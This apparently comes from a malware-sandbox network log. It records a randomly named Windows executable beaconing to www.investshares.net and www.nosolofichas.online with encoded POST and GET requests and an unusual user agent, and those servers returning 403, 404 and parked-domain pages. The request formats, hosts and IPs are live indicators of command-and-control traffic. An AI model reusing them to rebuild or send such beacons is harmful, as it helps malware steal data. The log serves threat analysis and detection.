                                                                      Jan 13, 2025 15:13:15.725334883 CET309INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:40 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.849727154.197.162.239801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:17.671190977 CET769OUTPOST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 69 43 78 75 43 44 50 70 47 32 51 36 53 4a 66 72 51 76 41 58 39 6d 37 4e 6b 37 2b 44 51 41 30 41 48 7a 44 64 39 31
                                                                      Data Ascii: 60q4=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLiCxuCDPpG2Q6SJfrQvAX9m7Nk7+DQA0AHzDd91
                                                                      Jan 13, 2025 15:13:18.240880013 CET309INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:42 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.849728154.197.162.239801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:20.219346046 CET1786OUTPOST /cf9p/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.investshares.net
                                                                      Origin: http://www.investshares.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.investshares.net/cf9p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 77 2b 2b 42 2b 6c 52 6c 49 31 41 4b 2b 79 70 73 61 45 47 35 4f 4c 52 4b 57 78 44 73 30 5a 4b 69 63 4d 39 50 73 53 2f 51 42 33 6a 47 72 42 42 74 4d 70 55 68 61 74 6e 2b 31 63 51 59 70 62 32 6b 46 73 71 47 72 2b 59 2f 30 38 6f 79 45 2f 4f 41 54 43 64 47 6c 73 50 58 44 38 55 45 2f 45 76 78 2f 62 44 59 53 66 2b 35 47 56 71 44 4a 6d 73 75 2f 4b 75 50 71 78 74 59 4a 6b 56 51 39 70 70 63 37 32 61 62 37 54 76 45 45 37 74 6b 6a 6e 7a 45 4c 68 53 31 6c 30 72 71 48 57 45 70 37 4d 6e 4d 74 78 38 [TRUNCATED]
                                                                      Data Ascii: 60q4=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/w++B+lRlI1AK+ypsaEG5OLRKWxDs0ZKicM9PsS/QB3jGrBBtMpUhatn+1cQYpb2kFsqGr+Y/08oyE/OATCdGlsPXD8UE/Evx/bDYSf+5GVqDJmsu/KuPqxtYJkVQ9ppc72ab7TvEE7tkjnzELhS1l0rqHWEp7MnMtx8Mg5QPBK7ixmCAtfOv2xYhzTx5hg6UtL1vgMBCQtt+YR7B60otxNOL6Wpz2n+/Gp8iz/l1dBcfBRNttlZu/+1prfkY2C4N3QwzurAElgrshcdyCaPdcIV9Blkscmev0QBJWWEYmaG1Yxfg4Fr478VNF6k4FASNKYbp4VtdS4A6bLAL/nrcbHX1O8PF25mIEbjUThD+23bvSnXWBswzobYSl402j3/y5YXh2YaOIVQh/oOMGdbLGPC2l99dIUU+5IH9fqcpDi+ic1FW1sdzuzeoAzmuarGID4FWr+P01DWX85WRWbRH43K/na9ivroElvu1KtOr2f9KrEnypcCnk8JDyFkffFkCbWqxwTBHWNqGFB1WnkFVXICQzmfbSSsYj2dhpanGyQQTIr4icOKfEaNHt2k5UAhelu+K5EfmaOEieZTA5n344he5I1rMpuP14YhUOwGQQZ9wPs04tOQ1DjOOdTUOxTl3OVLJC1ebhMvVj1b88GLbUqXMcvR5RnRChF6rDuV0bKVVgL6t1+ou76Mte2910oo0x+j9sXRRp/gFLoXx0Fclm/pMScYRioj6zO/r+7DJJ8hBBe2DX5Opk20n61VTRq0R8c3kAdQrpq3RnF9wph8qxyVg6IvPcizXSpzZXCNfJBRumNTjEnnzaPuFYTdnBmsyPGnKn [TRUNCATED]
                                                                      Jan 13, 2025 15:13:20.807104111 CET309INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:45 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.849729154.197.162.239801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:22.768860102 CET486OUTGET /cf9p/?60q4=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK8besZipepVANv+t7hBu9DYDfOtNcbRzWTW+UxqRkwAygg==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.investshares.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:23.336569071 CET141INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Sun, 12 Jan 2025 22:12:47 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 0
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.84973084.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:28.510818958 CET758OUTPOST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4b 4c 72 6f 44 47 36 4b 2b 66 67 37 4a 6e 49 6b 31 45 30 30 53 2f 5a 73 57 4b 37 76 5a 53 6d 31 57 77 44 68 37 52 38 41 51 68 6b 4a 4b 7a 33 72 4a 64 75 44 4e 63 74 33 6b 54 6d 6d 38 50 69 4c 4b 47 46 62 30 67 4c 36 46 2b 47 47 6c 55 48 37 4f 50 42 6d 77 4b 74 6a 37 78 63 52 2f 56 4c 76 76 45 75 4d 74 59 6e 2b 73 6a 48 50 33 70 75 35 5a 71 62 47 47 65 2f 2f 70 73 52 79 36 64 4e 2f 43 62 64 53 34 2b 61 4d 51 33 64 4a 36 44 46 42 68 66 2f 51 30 6c 34 4e 49 7a 56 57 6a 30 4f 49 61 46 7a 47 4b 31 41 62 7a 77 50 4f 52 59 68 50 46 42 55 7a 64 50 52 2f 4f 36 63 3d
                                                                      Data Ascii: 60q4=+VcDzAN33NkKKLroDG6K+fg7JnIk1E00S/ZsWK7vZSm1WwDh7R8AQhkJKz3rJduDNct3kTmm8PiLKGFb0gL6F+GGlUH7OPBmwKtj7xcR/VLvvEuMtYn+sjHP3pu5ZqbGGe//psRy6dN/CbdS4+aMQ3dJ6DFBhf/Q0l4NIzVWj0OIaFzGK1AbzwPORYhPFBUzdPR/O6c=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.84973184.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:31.063648939 CET778OUTPOST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4c 71 37 6f 51 33 36 4b 32 66 67 36 4d 6e 49 6b 2f 6b 30 77 53 2b 6c 73 57 4c 2f 2f 5a 67 43 31 57 55 48 68 36 56 6f 41 52 68 6b 4a 46 54 33 75 45 39 75 59 4e 63 68 46 6b 54 71 6d 38 50 32 4c 4b 48 31 62 30 58 6e 35 55 2b 47 41 71 30 48 31 44 76 42 6d 77 4b 74 6a 37 78 68 2b 2f 55 6a 76 75 30 65 4d 75 35 6e 78 6d 44 48 4d 79 70 75 35 64 71 62 43 47 65 2b 53 70 70 78 4d 36 65 31 2f 43 62 74 53 34 76 61 50 61 33 63 4d 30 6a 46 52 68 4b 4b 37 39 6c 6f 2b 49 67 35 66 6a 58 4b 41 66 7a 43 73 51 58 49 64 77 77 6e 6c 52 62 4a 35 41 32 4a 62 48 73 42 50 51 74 4a 31 5a 6c 30 2f 51 73 37 76 66 64 74 39 36 77 6c 31 4a 46 44 49
                                                                      Data Ascii: 60q4=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgC1WUHh6VoARhkJFT3uE9uYNchFkTqm8P2LKH1b0Xn5U+GAq0H1DvBmwKtj7xh+/Ujvu0eMu5nxmDHMypu5dqbCGe+SppxM6e1/CbtS4vaPa3cM0jFRhKK79lo+Ig5fjXKAfzCsQXIdwwnlRbJ5A2JbHsBPQtJ1Zl0/Qs7vfdt96wl1JFDI


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.84973284.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:33.611244917 CET1795OUTPOST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4c 71 37 6f 51 33 36 4b 32 66 67 36 4d 6e 49 6b 2f 6b 30 77 53 2b 6c 73 57 4c 2f 2f 5a 67 4b 31 57 68 54 68 37 30 6f 41 53 68 6b 4a 49 7a 33 76 45 39 75 5a 4e 63 49 4f 6b 54 32 63 38 4e 4f 4c 4b 6c 39 62 79 6d 6e 35 64 2b 47 41 79 45 48 34 4f 50 42 7a 77 4b 39 76 37 77 4e 2b 2f 55 6a 76 75 32 32 4d 36 59 6e 78 70 6a 48 50 33 70 75 6c 5a 71 61 58 47 64 4f 73 70 70 38 35 36 76 56 2f 42 37 39 53 72 4e 79 50 5a 58 63 4f 35 44 45 4f 68 4b 4f 6b 39 6c 30 79 49 68 4e 6d 6a 58 79 41 63 31 6e 6f 41 31 34 42 68 32 76 54 52 72 4e 48 4a 56 39 69 43 73 6c 75 59 2b 39 53 55 51 30 6b 51 66 75 37 62 4d 67 34 68 78 64 63 48 68 6d 59 64 48 68 49 31 74 4a 4a 6d 72 74 38 43 6d 4d 47 79 78 54 6c 78 37 64 6c 78 69 4e 31 46 39 72 37 69 46 4d 41 53 51 52 53 6b 33 55 4b 71 42 68 33 72 4d 4b 62 2f 58 75 2f 73 4a 62 64 32 62 55 58 41 7a 64 31 4a 73 2b 38 4d 4c 6d 70 79 6c 6f 74 64 61 69 6d 6d 43 45 68 32 69 44 44 31 47 58 55 52 48 4c 49 36 78 54 4f 42 32 6e 74 4d 57 42 4f 47 [TRUNCATED]
                                                                      Data Ascii: 60q4=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgK1WhTh70oAShkJIz3vE9uZNcIOkT2c8NOLKl9bymn5d+GAyEH4OPBzwK9v7wN+/Ujvu22M6YnxpjHP3pulZqaXGdOspp856vV/B79SrNyPZXcO5DEOhKOk9l0yIhNmjXyAc1noA14Bh2vTRrNHJV9iCsluY+9SUQ0kQfu7bMg4hxdcHhmYdHhI1tJJmrt8CmMGyxTlx7dlxiN1F9r7iFMASQRSk3UKqBh3rMKb/Xu/sJbd2bUXAzd1Js+8MLmpylotdaimmCEh2iDD1GXURHLI6xTOB2ntMWBOG1fKg+HV0tCGFc9cDNBstrMYx36W04whSHqhcaCRXY2IXYvX3/d63KZHlWafcIUGleriwg3mCNlTAv5JzM/CKw0XqmPps9QXmIkAh7HqjMLaIh+b0okvgWzfsFV47TGhc9lrd0Ieime/Qe2dUfdOjyBx7k/TIfcMdxWI2tr9RZRhBOmcLuamCmXMjin2YByzckE3AFXl35RTD4+Vl3aWKVxQ5ElwZZv3Mdt1cdcVv7tIaG3Skw2aPb+/C5mWV8nFuxbMlqc/BlXA9Um/91Pg9Yneu6AyNye1BigCFLW42ewxI70zmQ7qoKekgNeCpOhQSgRm/LKEDSoOKzIMUju9xjBE/iSOCtqG8UZOZYrMlycvKG4mEd9L6WXMzkuKz+KGxRckPp65t8JWuQAtuVz/Rc5xeZ7tFqMIobJlzq9vKM4+aNSeuLssT+ASJIZG05q8ajWMhBSQq9iOCbWl0j4De8utsSWy7UQbsB+9hWhNA69DBBTD4KpNT1Lyvf0UydnrTlFsL7gH6N/P1laPjNMXRT/DnemIHuf0OXMAN5RTlySwLTlqWzqPhWVUkdsDg4yd7csKlh12OeT7GK2nR7n2LU5NZXrqnQ6vwNa3tTjw2zfZ45R6gj/9EsOKKWvmlPuU/uodvFL/1Gnz9KE9Wianz7rgtpGRMwQ2pVk [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.84973384.32.84.32801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:13:36.152900934 CET489OUTGET /hqr6/?60q4=zX0jw1Jb7ql8GILmYUO6wMs9InQYjg93TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfeyls16INcIZma1Jpk987Wy75kHMsLzMhDfgt4WvdaOefQ==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.nosolofichas.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:36.621598959 CET1236INHTTP/1.1 200 OK
                                                                      Date: Mon, 13 Jan 2025 14:13:36 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 9973
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Server: hcdn
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      x-hcdn-request-id: 818adec0e2dd2e189286aedbc2144723-bos-edge4
                                                                      Expires: Mon, 13 Jan 2025 14:13:35 GMT
                                                                      Cache-Control: no-cache
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                      Jan 13, 2025 15:13:36.621623993 CET224INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                      Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30
                                                                      Jan 13, 2025 15:13:36.621634007 CET1236INData Raw: 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74 2d
                                                                      Data Ascii: px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0
                                                                      Jan 13, 2025 15:13:36.621709108 CET1236INData Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f 72
                                                                      Data Ascii: lign:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px;
                                                                      Jan 13, 2025 15:13:36.621720076 CET448INData Raw: 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                                      Data Ascii: align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{disp
                                                                      Jan 13, 2025 15:13:36.621732950 CET1236INData Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                                      Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
